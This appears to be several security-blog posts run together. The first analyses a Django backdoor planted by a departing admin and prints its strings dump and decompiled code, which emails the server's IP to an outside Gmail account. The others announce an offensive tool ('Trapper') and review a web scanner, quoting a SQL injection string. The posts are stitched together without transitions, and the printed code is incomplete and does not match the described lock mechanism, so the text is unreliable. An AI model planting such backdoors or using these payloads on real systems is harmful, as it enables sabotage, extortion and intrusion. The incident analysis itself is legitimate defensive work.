The problem raised when as soon as they took over the network within the hour a critical system for the business stopped working, this was more than suspicious as before in another business that was also admin by this person before had some files erased and configurations lost when it was transitioned to another admin because of lack of administration and ethics on the admin part.

First I tried to decompile the python files form the Django server, this was because obviously all the servers where blocked but for port 80. My friend innocently forgot to block all access to the internet as he thought that was not that hardcore important (#FAIL) and he didn’t really think this person (who know actually is consulting for a major bank in Mexico) would backdoor and do this type of stuff.

The first thing was to run it on strings to figure out what is there (credentials and paths removed for security reasons):

fsckOSX:~ nahual$ strings py_util.pyc
EmailMultiAlternatives(
MIMEImage(
datetimeN(
Parsers
fxxxxxxxxxxo@gmail.comt
mxxxgyyczzt
LOCKSYSTEMt
UNLOCKSYSTEMt
GETIPs$
/home/xxxxxxx/svn/yyyyyyyy/.python.logc
pop.gmail.comi
Subjectt
bloqueandot
desbloqueandot8
2baa224d0a3515912218fd88c1dd9d90d347c451c67811ac6240f4a1(
poplibt
POP3_SSLt
usert
pass_t
passwdt
Exceptiont
lent
listt
ranget
retrt
joinR
parsestrt
LOCKt
opent
file_logt
writet
closet
UNLOCKR
check_ipt
quit(
errt
numerot
responset
headerLinest
bytest
mensajet
emailt
subjectt
/home/xxxxxxx/svn/yyyyyyy/../yyyyyyy/py_util.pyt
check_locker
setup_environ(
BeautifulSoups
hxxxxxxx3@gmail.comR

http://www.cualesmiip.comt

divt
miipt
IP del servidort
from_emails
text/html(
urllib2t
django.core.managementR/
xml.dom.minidomR0
settingst
urlopent
readt
findt
findAllR
DEFAULT_FROM_EMAILt
attach_alternativet
send(
xmlR0
listmailt
contentt
feedR&
html_contentR,
msg(
/home/xxxxxxx/svn/yyyyyy/../yyyyyy/py_util.pyR
__main__(
django.core.mailR
email.MIMEImageR
smtplibR
email.ParserR
__name__(
/home/xxxxxxxx/svn/yyyyyy/../yyyyy/py_util.pyt

fsckOSX:~ nahual$

py_util.pyc wouldn’t fastly decompile, thus after putting it into IDA and other nice decompile this is what was found (credentials removed for security reasons):


from django.core.mail import EmailMultiAlternatives
from email.MIMEImage import MIMEImage
from datetime import datetime
import smtplib
import poplib
from email.Parser import Parser

def check_ip():
import urllib2
from django.core.management import setup_environ
import xml.dom.minidom
from BeautifulSoup import BeautifulSoup
import settings
setup_environ(settings)
listmail = ['xxxxxxxx@gmail.com']
content = ''
feed = urllib2.urlopen('http://www.google.com')
response = BeautifulSoup(feed.read())
html_content = response.find('div', {'id': 'miip'}).findAll('b')[0]
subject = 'IP del servidor'
msg = EmailMultiAlternatives(subject, content, to=listmail, from_email=settings.DEFAULT_FROM_EMAIL)
msg.attach_alternative(html_content, 'text/html')
msg.send()
if (__name__ == '__main__'):
check_ip()


As you can see the backdoor is pretty small and “efficient”, it checks a gmail account, if an email to that account is sent with the LOCKSYSTEM it will automatically shutdown the application, and you can of course unlock the system with another email.

This might be coded because they thought maybe the client wouldn’t pay them? why would he code something like this without the client consent? no documentation was delivered from the code, and as soon as the admin/developer was let go, the system was shutdown within the hour, sounds to me more like a blackmail function than a current admin function as it only turns off the system, no backups anything.

This makes me wonder why this would be created? or executed? I thought about writing a fast and ugly rule to make sure if anything happened like this again at least the snorts would be alerted and told my friend to lock down the firewall rules, but this lack of ethics is overwhelming, I wonder what the bank would think of him being used to backdoor stuff to keep a foot in the door? jeeeeezzzzz

Snort rule would not really work as it’s doing pop3 over SSL, but then blocking port 993 should lock him out, still … why people do this? don’t they understand this lack of ethics is preposterous?

This is a complete recode of trapper, even changing the language for ruby, having namespaces on it and the capabilities to attack and exploit miss-configurations.

I’m going to be exporting a git repository the first week of August with the public version of Trapper 1.0 in git.security-dojo.com (It’s not setup yet so don’t even try) and version 1.1 should hit around september in Sec-T.

What stuff is being coded or tested now?

- Sniffing
- Cracking the hashes
- Using hashes to bring more hosts into the game
- Reading emails
- Reading applications
- SSH and telnet into hosts
- Start other sniffer heads in different OS (This is going to take time but oh well)
- More to come!

If you are interested in beta testing Trapper drop me an email, you might not get the chance since I’m really picky on who betas my stuff but you can try :P

1. They are slow
2. They don’t have a sense of “weight” on the exploits
3. They miss half of the complex stuff

Couple of weeks ago we lost a bid based on the fact that the client tought we did everything automatic (Errr LoL! apparently they don’t read the blog, didn’t read my resume and didn’t reaaaaally understood some facts but then again who can blame the girl that was in charge?) this was hilarious but posed a very good question:

Why all scanners SUCK ARE BAD?

I’m not saying I’m way better than all of them, but given enough time I can find even more stuff than them on simple and way more on complex privilege escalation ones, I find myself writting my own tools for jobs and trying to make them as smart as I can, this is really a fun but slow job.

You would really think that since ALL webscanners have sites to try your scanner against they would make sure they would get most of the bugs even on those sites right? .. WROOOOOOOOONG most scanners found 50% of the bugs, God that makes you feel such a nice feeling, knowing you just got a very expensive web scanner to find .. HALF OF YOUR BUGS!

Anyway most of people know I usually get get software and products to break them up and then just either keep them (like my cisco routers) or give them back (like the Tipping Points … I never get to keep one! -_- ), this time I got the “pepsi challenge” from NT Objectives couple of weeks ago, and I was pleasantly surprised when I managed to hack into my intranet test sites before it, with a nice smile waited untill it finished saw the report, then passed the next 2 days trying to figure out 30% of the bugs it found.

I contacted them and chatted to them, I showed them my results and they showed me how to reproduce it raw and on HTML and I finally figured those out, I didn’t even know my sites had those bugs, I started o read up on their site and chat with their engineers and realized they have JavaScript Machines not to only parse the code but to actually run it, so they actually try different variations to bypass the javascript, try referer SQL injections, save web pages to actually find and differentiate from Blind SQL Injection AND (And this got me in love with the damn scanner) they actually find the COMPLETE injection, not just like “ok this breaks thank you for using our scanner now go make the exploit work yourself” kind of deal, noooo nooo noooo I mean this dudes find the entire SQL string you can just click on “verify” and you can check the exploit and get the URL to push it into your favorite injection tool if you want, figuring that out usually takes a while and is annoying (on this specific site the bug was inside a procedure so most of the scanners just broke the stuff but never really exploited and they found the ) and made the “foo’) or (1=1” to gather how bad or good was the injection.

I’m really not going to go into detail in the results and how good it is, all I can say is .. I went and bought it for myself, dropping all the other web scanners, don’t need them anymore at all, I still run everthing by hand anyway, but I feel confident than the low hanging fruit will be covered by this thing and hasn’t failed me yet.

I’ll leave you with the links so you can read up on the report, I found it very interesting!

Slashdot link covering the report
Original report
PDF of the report